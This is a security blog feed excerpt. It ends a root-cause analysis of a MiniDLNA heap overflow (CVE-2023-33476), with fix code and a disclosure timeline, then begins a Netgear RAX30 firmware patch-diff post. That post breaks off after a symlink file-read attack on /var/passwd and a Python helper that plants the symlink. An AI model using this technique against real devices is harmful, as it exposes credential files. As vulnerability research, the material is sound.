<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">while</span><span class="p">(</span> <span class="p">(</span><span class="n">line</span> <span class="o">&lt;</span> <span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">))</span> <span class="o">&amp;&amp;</span>
           <span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">line</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">endptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
           <span class="p">(</span><span class="n">endptr</span> <span class="o">!=</span> <span class="n">line</span><span class="p">)</span> <span class="p">)</span>
</code></pre></div></div>

<p>The following checks are performed:</p>
<ul>
  <li>Check that the char pointer <code class="language-plaintext highlighter-rouge">line</code> has not been advanced past the end of the allocation in <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code>.
<code class="language-plaintext highlighter-rouge">line</code> is advanced by the parsed <code class="language-plaintext highlighter-rouge">req_chunklen</code> at the end of the inner block of the while loop.</li>
  <li>Attempt to parse a size value using <code class="language-plaintext highlighter-rouge">strtol()</code> and ensure the value is greater than 0.</li>
  <li>Ensure the char pointer <code class="language-plaintext highlighter-rouge">endptr</code> is not pointing to the same location as <code class="language-plaintext highlighter-rouge">line</code> after the call to
<code class="language-plaintext highlighter-rouge">strtol()</code>, which would indicate that no parsable digit was found.</li>
</ul>

<p>The bug occurs in the evaluation of the second condition, where <code class="language-plaintext highlighter-rouge">strtol()</code> is called; the intent is
for the return value of <code class="language-plaintext highlighter-rouge">strtol()</code> to be saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> and to compare the saved
value to 0 for the validation step. Instead, because <code class="language-plaintext highlighter-rouge">&gt;</code> binds more tightly than <code class="language-plaintext highlighter-rouge">=</code> in C, the
result of the comparison expression <code class="language-plaintext highlighter-rouge">strtol(x,x) &gt; 0</code> is what gets saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code>.
That Boolean result is 1 for every size greater than 0, so the total expected request size is
calculated incorrectly.</p>
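
<p>The precedence issue is easy to reproduce in isolation. The two helpers below are hypothetical and
only exist to demonstrate the difference; the conditions mirror the shape of the one in
<code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code>, with a local variable standing in for <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code>.</p>

```c
#include <assert.h>
#include <stdlib.h>

/* Same shape as the buggy condition: `>` is evaluated before `=`, so the
 * value stored in chunklen is the comparison result (0 or 1). */
long parse_chunklen_buggy(const char *line)
{
    char *endptr;
    long chunklen;

    assert(line != NULL);

    if ((chunklen = strtol(line, &endptr, 16) > 0) && endptr != line)
        return chunklen;
    return 0;
}

/* Parenthesized assignment: the parsed value is stored first, then compared. */
long parse_chunklen_fixed(const char *line)
{
    char *endptr;
    long chunklen;

    assert(line != NULL);

    if (((chunklen = strtol(line, &endptr, 16)) > 0) && endptr != line)
        return chunklen;
    return 0;
}
```

<p>Feeding both helpers the chunk size line <code class="language-plaintext highlighter-rouge">ffff\r\n</code> gives 1 from the buggy version and 0xffff from
the parenthesized one.</p>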

<p>Within the inner block of the while loop, the value saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> is used to increment
the <code class="language-plaintext highlighter-rouge">line</code> pointer to the location where the next chunk size is expected, indicating the true
intent of the code (comments added for annotation).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="p">{</span>
        <span class="n">endptr</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">endptr</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">endptr</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="k">return</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="c1">// if strtol() returned a size greater than 0, req_chunklen holds 1 (the result of</span>
        <span class="c1">// the comparison, not the parsed size), so `line` never advances by the real chunk</span>
        <span class="c1">// length. This means the first validation condition in the while loop will not properly</span>
        <span class="c1">// detect large values that exceed the size of the request buffer allocation</span>
        <span class="n">line</span> <span class="o">=</span> <span class="n">endptr</span><span class="o">+</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="o">+</span><span class="mi">2</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>This means that even for very large chunk sizes, the chunk length added to the <code class="language-plaintext highlighter-rouge">line</code> pointer is
never more than 1 on each iteration through the loop, so the bounds check in the first
condition of the while loop does not catch chunk sizes that exceed the length of
data sent in the request body.</p>
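
<p>The effect is easier to see with the loop pulled out into a small standalone function. This is a
rough sketch based only on the loop shown above, not the actual MiniDLNA code:
<code class="language-plaintext highlighter-rouge">scan_chunk_sizes()</code> and its <code class="language-plaintext highlighter-rouge">buggy</code> flag are hypothetical, and it tracks an offset instead of a
raw pointer so that oversized chunk lengths don’t push pointer arithmetic out of bounds. It returns
the last value that would have been left in <code class="language-plaintext highlighter-rouge">req_chunklen</code>, where 0 means the request is treated
as complete.</p>

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Walk the chunk size lines of a null-terminated body of body_len bytes.
 * buggy != 0 stores the comparison result (0 or 1), like the flawed loop;
 * buggy == 0 stores the parsed size, like the corrected loop. */
long scan_chunk_sizes(const char *body, long body_len, int buggy)
{
    long off = 0;
    long chunklen = -1;
    char *endptr;

    assert(body != NULL);

    while (off < body_len) {
        long parsed = strtol(body + off, &endptr, 16);

        chunklen = buggy ? (parsed > 0) : parsed;
        if (chunklen <= 0 || endptr == body + off)
            break;

        /* A chunk at least as long as the body would move `off` past the end
         * and stop the loop anyway; stopping here avoids integer overflow. */
        if (chunklen >= body_len)
            break;

        endptr = strstr(endptr, "\r\n");
        if (!endptr)
            break;

        off = (long)(endptr - body) + chunklen + 2;
    }
    return chunklen;
}
```

<p>With the 11-byte body <code class="language-plaintext highlighter-rouge">ffff\r\n0\r\n\r\n</code>, the buggy variant ends with 0 and the request is treated
as complete, while the corrected variant ends with 0xffff, signalling that the declared chunk
doesn’t fit in what was received.</p>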

<h3 id="oob-readwrite-on-chunk-sizes--request-length-in-processhttpquery_upnphttp">OOB read/write on chunk sizes &gt; request length in ProcessHttpQuery_upnphttp()</h3>

<p>After the headers have been parsed in <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code>, execution returns to
<code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code>, where the value saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> is checked; if it is 0
after the request header parsing, it is assumed that the full request has been received and that
the request buffer at <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> is large enough to fit all the expected data based on chunk
sizes.</p>

<p>Parsing of the actual chunks from the request body then continues in the code block below
(upnphttp.c:893) after returning from <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="kt">char</span> <span class="o">*</span><span class="n">chunkstart</span><span class="p">,</span> <span class="o">*</span><span class="n">chunk</span><span class="p">,</span> <span class="o">*</span><span class="n">endptr</span><span class="p">,</span> <span class="o">*</span><span class="n">endbuf</span><span class="p">;</span>
    <span class="c1">// chunk, endbuf, and chunkstart all begin pointing to the start of the http request body</span>
    <span class="n">chunk</span> <span class="o">=</span> <span class="n">endbuf</span> <span class="o">=</span> <span class="n">chunkstart</span> <span class="o">=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span><span class="p">;</span>

    <span class="k">while</span> <span class="p">((</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">chunk</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">endptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">endptr</span> <span class="o">!=</span> <span class="n">chunk</span><span class="p">)</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="n">endptr</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">endptr</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">endptr</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">Send400</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
            <span class="k">return</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">endptr</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">;</span>

        <span class="c1">// this call to memmove will use the chunklen parsed by strtol() above</span>
        <span class="c1">// without checking that it doesn't read beyond the end of the request buf.</span>
        <span class="n">memmove</span><span class="p">(</span><span class="n">endbuf</span><span class="p">,</span> <span class="n">endptr</span><span class="p">,</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">);</span>

        <span class="n">endbuf</span> <span class="o">+=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">;</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">endptr</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentlen</span> <span class="o">=</span> <span class="n">endbuf</span> <span class="o">-</span> <span class="n">chunkstart</span><span class="p">;</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">=</span> <span class="n">endbuf</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">;</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">state</span> <span class="o">=</span> <span class="mi">100</span><span class="p">;</span>
</code></pre></div></div>

<p>Summary of while loop conditions/checks:</p>
<ul>
  <li>Condition 1:
    <ul>
      <li>Attempt to parse a chunk size number as a <code class="language-plaintext highlighter-rouge">long</code> using <code class="language-plaintext highlighter-rouge">strtol()</code>, passing in the <code class="language-plaintext highlighter-rouge">chunk</code>
  pointer which begins the while loop pointing to the start of the request body section
  (immediately following the headers). The number will be parsed as base 16, meaning hex digits
  A-F are considered valid.</li>
      <li>The return value of the call to <code class="language-plaintext highlighter-rouge">strtol()</code> is saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> and a comparison is
  performed to check whether it is greater than 0; this must evaluate to true for the parsing
  to continue.</li>
    </ul>
  </li>
  <li>Condition 2:
    <ul>
      <li>Check that the value that <code class="language-plaintext highlighter-rouge">strtol()</code> saved to <code class="language-plaintext highlighter-rouge">endptr</code> does not point to the same place as
  <code class="language-plaintext highlighter-rouge">chunk</code>, which would indicate that no valid numeric value could be parsed from the string.</li>
    </ul>
  </li>
</ul>

<p>The code in this block relies on the validation performed during the header parsing step and so it
parses and uses the user-controlled chunk size as the size argument in calls to <code class="language-plaintext highlighter-rouge">memmove()</code> without
bounds checking. <strong>This results in the application accepting chunk size values that exceed the
number of bytes received in the request, leading to an OOB read/write.</strong></p>
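
<p>For comparison, here’s a sketch of what the same de-chunking loop could look like with an explicit
bounds check before the copy. This isn’t the fix that was applied upstream and
<code class="language-plaintext highlighter-rouge">dechunk_in_place()</code> is a hypothetical name; it’s only meant to show which check is missing, under
the assumption that the body is null terminated and <code class="language-plaintext highlighter-rouge">body_len</code> bytes long.</p>

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* De-chunk a null-terminated body of body_len bytes in place.
 * Returns the decoded length, or -1 if a chunk is malformed or claims
 * more data than the buffer actually holds. */
long dechunk_in_place(char *body, long body_len)
{
    char *chunk = body, *endbuf = body, *endptr;
    char *end;
    long chunklen;

    assert(body != NULL && body_len >= 0);
    end = body + body_len;

    while ((chunklen = strtol(chunk, &endptr, 16)) > 0 && endptr != chunk) {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
            return -1;
        endptr += 2;

        /* the check the original loop lacks: chunk data must fit in the buffer */
        if (chunklen > end - endptr)
            return -1;

        memmove(endbuf, endptr, (size_t)chunklen);
        endbuf += chunklen;
        chunk = endptr + chunklen;
    }
    return (long)(endbuf - body);
}
```

<p>A well-formed body such as <code class="language-plaintext highlighter-rouge">3\r\nabc\r\n2\r\nde\r\n0\r\n\r\n</code> decodes to the five bytes <code class="language-plaintext highlighter-rouge">abcde</code>,
while a body that declares a chunk size of <code class="language-plaintext highlighter-rouge">ffff</code> but only carries a few bytes is rejected instead
of being copied.</p>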

<p>The <code class="language-plaintext highlighter-rouge">while</code> loop used to iterate through the chunks in this block is nearly identical
to the one in <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code>, except this one includes an additional set of parentheses
around the assignment and comparison expressions in the call to <code class="language-plaintext highlighter-rouge">strtol()</code>, resulting in the
correct assignment of the return value to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code>. Had the same bug present in the
<code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> chunk size parsing code been introduced here, it would have probably been
noticed much sooner as chunks would likely get truncated as a result of the incorrect logic.</p>

<h2 id="conclusion">Conclusion</h2>

<h3 id="suggested-fix">Suggested Fix</h3>

<p>The issue can be fixed by adding parentheses around the assignment expression in the second
condition of the chunk size validation while loop in <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> (upnphttp.c:150), so that
the assignment is evaluated before the comparison against 0.</p>

<p>The fixed code would be:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">while</span> <span class="p">((</span><span class="n">line</span> <span class="o">&lt;</span> <span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">))</span> <span class="o">&amp;&amp;</span>
           <span class="p">((</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">line</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">endptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="c1">// FIX HERE</span>
           <span class="p">(</span><span class="n">endptr</span> <span class="o">!=</span> <span class="n">line</span><span class="p">)</span> <span class="p">)</span>
</code></pre></div></div>

<p>A patch with this fix was provided to the package maintainer along with the vulnerability report.</p>

<h3 id="disclosure-timeline">Disclosure Timeline</h3>

<ul>
  <li>2023-04-18: Submitted vulnerability report to Zero Day Initiative RE: vulnerable Netgear RAX30</li>
  <li>2023-05-04: ZDI rejects the vulnerability report (not interested in the product)</li>
  <li>2023-05-05: Request a CVE ID from Mitre</li>
  <li>2023-05-05: Unable to find a private avenue to report to the package maintainer directly, so instead submit
reports to Debian and Ubuntu security teams since they have vuln versions in their repos</li>
  <li>2023-05-08: Debian security team shares the email address of the package maintainer; reach out to
them over email and submit a private bug report on the Sourceforge page.</li>
  <li>2023-05-08: Package maintainer acknowledges report and begins working on fix</li>
  <li>2023-05-31: Package maintainer releases fixed version, 1.3.3</li>
  <li>2023-05-31: Follow up message to Mitre, CVE assignment pending</li>
  <li>2023-06-02: Mitre assigns the vulnerability CVE-2023-33476</li>
</ul>

<h3 id="exploitation">Exploitation</h3>

<p>As this is a heap-based vulnerability, exploitability of this issue will depend, to some extent,
on the glibc version the application is linked against and on compiler exploit mitigations.
Ultimately, because the bug provides a strong read/write primitive, there are various options
for exploitation.</p>

<p><strong>Part 2 of this series going over the exploit development process and the exploits I wrote for this bug
can be found <a href="https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits.html">here</a>.</strong></p>

<h3 id="referencelinks">Reference/Links</h3>

<ul>
  <li><a href="https://github.com/mellow-hype/cve-2023-33476">Exploits</a></li>
  <li><a href="https://sourceforge.net/projects/minidlna/files/">MiniDLNA Project Home</a></li>
  <li><a href="https://sourceforge.net/p/minidlna/git/ci/9bd58553fae5aef3e6dd22f51642d2c851225aec/">Bug fix commit</a></li>
  <li><a href="https://sourceforge.net/p/minidlna/bugs/355/">Original Git issue where bug was reported</a></li>
  <li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33476">Mitre: CVE-2023-33476</a></li>
  <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-33476">NIST National Vulnerability Database: CVE-2023-33476</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="0day" /><category term="0day" /><category term="disclosure" /><category term="minidlna" /><category term="exploit" /><category term="cve-2023-33476" /><summary type="html"><![CDATA[first part in a two-part series going over a heap overflow in MiniDLNA, a media server commonly deployed in embedded environments. this post provides a summary and root cause analysis of the vulnerability.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/minidlna-1.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/minidlna-1.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">RAX30 Patch Diff Analysis &amp;amp; Nday Exploit for ZDI-23-496</title><link href="https://blog.coffinsec.com/nday/2023/05/12/rax30-patchdiff-nday-analysis.html" rel="alternate" type="text/html" title="RAX30 Patch Diff Analysis &amp;amp; Nday Exploit for ZDI-23-496" /><published>2023-05-12T00:00:00+00:00</published><updated>2023-05-12T00:00:00+00:00</updated><id>https://blog.coffinsec.com/nday/2023/05/12/rax30-patchdiff-nday-analysis</id><content type="html" xml:base="https://blog.coffinsec.com/nday/2023/05/12/rax30-patchdiff-nday-analysis.html"><![CDATA[<p>Having recently spent some time working on an exploit for an 0day I’d found on the RAX30, the recent release of a few ZDI advisories for this device caught my attention. I took a quick look to confirm there weren’t any collisions with my bug, and after confirming this wasn’t the case (phew!), I decided to use this as an opportunity to do some patch diff analysis and see if there were any bugs worth writing exploits for.</p>

<h2 id="overview">Overview</h2>

<p><strong>Target bugs:</strong></p>

<ul>
  <li><a href="https://www.zerodayinitiative.com/advisories/ZDI-23-499/">ZDI-23-499</a>: <code class="language-plaintext highlighter-rouge">soap_serverd</code> buffer overflow</li>
  <li><a href="https://www.zerodayinitiative.com/advisories/ZDI-23-496/">ZDI-23-496</a>: <code class="language-plaintext highlighter-rouge">lighttpd</code> misconfiguration -&gt; RCE</li>
</ul>

<p><strong>Target firmware versions:</strong></p>

<ul>
  <li>Prepatch: 1.0.9</li>
  <li>Patched: 1.0.10</li>
</ul>

<h2 id="analysis">Analysis</h2>

<h3 id="zdi-23-499-soap_serverd-stack-based-buffer-overflow">ZDI-23-499: soap_serverd stack-based buffer overflow</h3>

<p>The description of this bug says the flaw occurs because “when parsing SOAP message headers, the process does not properly validate user supplied data before copying it to a fixed-length stack buffer.” Based on my previous experience with Netgear and specifically their SOAP server implementations, I had a pretty good idea where to look. In fact, I even had a hunch that this was the same as (or at least similar to) a bug I’d found on another Netgear device last year, so before spending much time going through the diff’ed binaries, I did a quick search for references to <code class="language-plaintext highlighter-rouge">sscanf</code> in the patched and unpatched versions and pretty easily identified where the bug occurred. Interestingly, this bug is very similar to, but distinct from, the issue I’d previously found. Leave it to Netgear to ship two separate vulnerabilities using the same vulnerable C function in code that processes the same data lol.</p>

<p>The bug is caused by use of <code class="language-plaintext highlighter-rouge">sscanf()</code> without supplying length-limit values in the format string. The vulnerable version of the code attempts to parse out the HTTP method, path, and HTTP version string from the header using the following code:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="n">iVar1</span> <span class="o">=</span> <span class="n">__isoc99_sscanf</span><span class="p">(</span><span class="n">local_3024</span><span class="p">,</span><span class="s">"%[^ ] %[^ ] %[^ ]"</span><span class="p">,</span><span class="o">&amp;</span><span class="n">v1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v2</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v3</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">iVar1</span> <span class="o">==</span> <span class="mi">3</span><span class="p">)</span> <span class="p">{</span>
      <span class="n">iVar7</span> <span class="o">=</span> <span class="n">strcasecmp</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">v1</span><span class="p">,</span> <span class="s">"post"</span><span class="p">);</span>
</code></pre></div></div>

<p>This is the patched version of the same code, showing the addition of length limit specs in the format string:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="n">iVar1</span> <span class="o">=</span> <span class="n">__isoc99_sscanf</span><span class="p">(</span><span class="o">&amp;</span><span class="n">local_1824</span><span class="p">,</span><span class="s">"%511[^ ] %511[^ ] %511[^ ]"</span><span class="p">,</span><span class="o">&amp;</span><span class="n">v1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v2</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v3</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">iVar1</span> <span class="o">==</span> <span class="mi">3</span><span class="p">)</span> <span class="p">{</span>
      <span class="n">iVar7</span> <span class="o">=</span> <span class="n">strcasecmp</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">v1</span><span class="p">,</span><span class="s">"post"</span><span class="p">);</span>
</code></pre></div></div>

<p>On the surface this looks like a pretty straightforward stack-based buffer overflow, and there seem to be some variables within the function that may be interesting targets for overwrite. An interesting note is that the advisory does not indicate this bug results in code execution but instead specifically mentions that it can be used to bypass authentication. This may be due to the fact that the binary is built with stack canaries, which makes exploitation more difficult. This is the same reason why I’d been unable to exploit the variant of this bug I mentioned earlier.</p>

<p><strong>NOTE</strong>: The folks who discovered and exploited this bug at Pwn2Own posted their write-up of this bug before I had finished this post so I’ve been able to confirm the above assumption was correct: the stack canaries resulted in the bug not being directly exploitable for code exec. Check out their write-up <a href="https://claroty.com/team82/research/chaining-five-vulnerabilities-to-exploit-netgear-nighthawk-rax30-routers-at-pwn2own-toronto-2022">here</a> to see how they chained this bug with a few others to get RCE.</p>

<h3 id="zdi-23-496-lighttpd-misconfiguration-rce">ZDI-23-496: lighttpd Misconfiguration RCE</h3>

<p>The information provided about this bug indicates it isn’t a memory corruption issue but a misconfiguration that results in arbitrary code execution. Specifically it says:</p>

<blockquote>
  <p>The specific flaw exists within the configuration of the lighttpd HTTP server. The issue results from allowing execution of files from untrusted sources. An attacker can leverage this vulnerability to execute code in the context of root.</p>
</blockquote>

<p>Based on this description, I focused on comparing the lighttpd configuration files in <code class="language-plaintext highlighter-rouge">etc/lighttpd</code> between the two versions.</p>
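
<p>A recursive diff of the two extracted firmware root filesystems is enough to surface changes like these. The sketch below is one way to do that with Python’s standard library. It is only an illustration: the function names are mine, and the directory names in the usage note are hypothetical and depend on how the firmware images were unpacked.</p>

```python
import difflib
from pathlib import Path


def list_files(root):
    """Return the set of file paths under root, relative to root."""
    root = Path(root)
    return {p.relative_to(root) for p in root.rglob("*") if p.is_file()}


def diff_config_trees(old_root, new_root):
    """Return unified-diff lines for every file that differs between two trees."""
    old_root, new_root = Path(old_root), Path(new_root)
    lines = []
    # Walk the union of both trees so added and removed files show up too.
    for rel in sorted(list_files(old_root) | list_files(new_root)):
        old_file, new_file = old_root / rel, new_root / rel
        old_text = old_file.read_text(errors="replace") if old_file.is_file() else ""
        new_text = new_file.read_text(errors="replace") if new_file.is_file() else ""
        # unified_diff yields nothing for identical inputs, so unchanged files are skipped.
        lines.extend(
            difflib.unified_diff(
                old_text.splitlines(),
                new_text.splitlines(),
                fromfile=f"prepatch/{rel}",
                tofile=f"patched/{rel}",
                lineterm="",
            )
        )
    return lines
```

<p>Calling <code class="language-plaintext highlighter-rouge">diff_config_trees("fw-1.0.9/etc/lighttpd", "fw-1.0.10/etc/lighttpd")</code> (hypothetical paths) and printing the returned lines gives a per-file view of what the patch touched.</p>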

<h4 id="comparing-config-changes">Comparing Config Changes</h4>

<p><strong><code class="language-plaintext highlighter-rouge">etc/lighttpd/conf.d/lighttpd4.conf</code></strong></p>

<p>The patched version of this file includes the following additions:</p>

<ul>
  <li>Addition of <code class="language-plaintext highlighter-rouge">alias.url = ("/shares" =&gt; "/var/samba/share/")</code> at the global level</li>
  <li>Inside the <code class="language-plaintext highlighter-rouge">HTTP["url"] = "^/shares"</code> definition for “usb storage” in the IPv4 section
    <ul>
      <li><code class="language-plaintext highlighter-rouge">server.follow-symlink = "disable"</code></li>
      <li><code class="language-plaintext highlighter-rouge">static-file.exclude-extensions = ()</code></li>
      <li><code class="language-plaintext highlighter-rouge">fastcgi.server = ()</code></li>
    </ul>
  </li>
</ul>

<p><strong><code class="language-plaintext highlighter-rouge">etc/lighttpd/conf.d/usb_lighttpd.conf</code></strong></p>

<ul>
  <li>Addition of <code class="language-plaintext highlighter-rouge">alias.url = ("/shares" =&gt; "/var/samba/share/")</code> at the global level</li>
</ul>

<p><strong><code class="language-plaintext highlighter-rouge">etc/lighttpd/conf.d/usb_allow.inc</code></strong></p>

<ul>
  <li>Inside the <code class="language-plaintext highlighter-rouge">HTTP["url"] = "^/shares"</code> definition for “usb storage” in the IPv4 section
    <ul>
      <li><code class="language-plaintext highlighter-rouge">server.follow-symlink = "disable"</code></li>
      <li><code class="language-plaintext highlighter-rouge">static-file.exclude-extensions = ()</code></li>
      <li><code class="language-plaintext highlighter-rouge">fastcgi.server = ()</code></li>
    </ul>
  </li>
</ul>

<p><strong><code class="language-plaintext highlighter-rouge">etc/lighttpd/conf.d/usb_allow_auth.inc</code></strong></p>

<ul>
  <li>Inside the <code class="language-plaintext highlighter-rouge">HTTP["url"] = "^/shares"</code> definition for “usb storage” in the IPv4 section
    <ul>
      <li><code class="language-plaintext highlighter-rouge">server.follow-symlink = "disable"</code></li>
      <li><code class="language-plaintext highlighter-rouge">static-file.exclude-extensions = ()</code></li>
      <li><code class="language-plaintext highlighter-rouge">fastcgi.server = ()</code></li>
    </ul>
  </li>
</ul>

<h4 id="conclusions-based-on-changes">Conclusions Based on Changes</h4>

<p>The issue seems to be focused around the <code class="language-plaintext highlighter-rouge">/shares</code> path, which is mapped to the samba share directory where mounted USB drives can be accessed on the network like a NAS. The addition of <code class="language-plaintext highlighter-rouge">server.follow-symlink = "disable"</code> suggests the issue may result in the ability to access files on the host filesystem using symlinks on the mounted drive.</p>

<p>It’s possible that the addition of <code class="language-plaintext highlighter-rouge">fastcgi.server = ()</code> was needed to avoid having the global settings for this handler apply. The top-level <code class="language-plaintext highlighter-rouge">fastcgi.server</code> assignment in <code class="language-plaintext highlighter-rouge">conf.d/lighttpd4.conf</code> shows the following:</p>

<div class="language-nginx highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fastcgi.server</span> <span class="s">+=</span> <span class="s">(</span>
	<span class="s">".php"</span> <span class="p">=</span><span class="s">&gt;</span> <span class="s">((</span>
		<span class="s">"socket"</span> <span class="p">=</span><span class="s">&gt;</span> <span class="s">"/var/run/php-fpm.sock",</span>
		<span class="c1">#"bin-path" =&gt; "/bin/php-fpm -n -R -y /etc/php-fpm.conf",</span>
		<span class="c1">#"max-procs" =&gt; 1,</span>
		<span class="s">"broken-scriptfilename"</span> <span class="p">=</span><span class="s">&gt;</span> <span class="s">"enable"</span>
	<span class="s">))</span>
<span class="s">)</span>
</code></pre></div></div>

<p>This led me to believe that the absence of an explicit <code class="language-plaintext highlighter-rouge">fastcgi.server = ()</code> in the pre-patched version resulted in the global setting being applied, which would allow PHP files under <code class="language-plaintext highlighter-rouge">/shares</code> to be executed.</p>

<h2 id="exploits-zdi-23-496-lighttpd-misconfiguration">Exploits: ZDI-23-496 Lighttpd Misconfiguration</h2>

<p>Based on the conclusions drawn from the changes made, the most likely entry point was going to be files mounted via USB drive, so I created an ext2-formatted drive to use for testing (ext2 since it was going to be necessary to create symlinks) and downgraded to the vulnerable firmware version.</p>

<h3 id="local-file-inclusion-via-symlink">Local File Inclusion via Symlink</h3>

<p>My assumption was that the addition of the symlink config options in the latest patches meant that the vulnerable version would follow symlinks resulting in the ability to reference (and access) files outside of the USB filesystem. To test this, I created a symlink on the USB drive pointing to <code class="language-plaintext highlighter-rouge">/var/passwd</code> as this is where the actual passwd file is stored on the device at runtime. If the assumption is correct, accessing this file from the router should return the actual password file from the device.</p>

<p>After connecting the USB drive to the router, the files become visible at <code class="language-plaintext highlighter-rouge">http://&lt;routerip&gt;/shares/</code>. Accessing the symlink that was created pointing to <code class="language-plaintext highlighter-rouge">/var/passwd</code> results in the actual password file on the device (found at that path) being returned and downloaded locally.</p>

<p><img src="/assets/images/pocrax-passwd.png" alt="pocrax-passwd.png" /></p>
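
<p>Planting a link like this takes one call from any Linux machine with the drive mounted. A minimal sketch follows, where the mount point and link name are hypothetical. Note that the link target only needs to resolve on the router, so it is fine for it to dangle (or point at something else) on the machine where it is created.</p>

```python
import os


def plant_symlink(mount_point, link_name, target="/var/passwd"):
    """Create a symlink on the mounted drive that points at a path on the router."""
    link_path = os.path.join(mount_point, link_name)
    # os.symlink does not check that the target exists; it is resolved later,
    # by whichever system ends up following the link.
    os.symlink(target, link_path)
    return link_path
```

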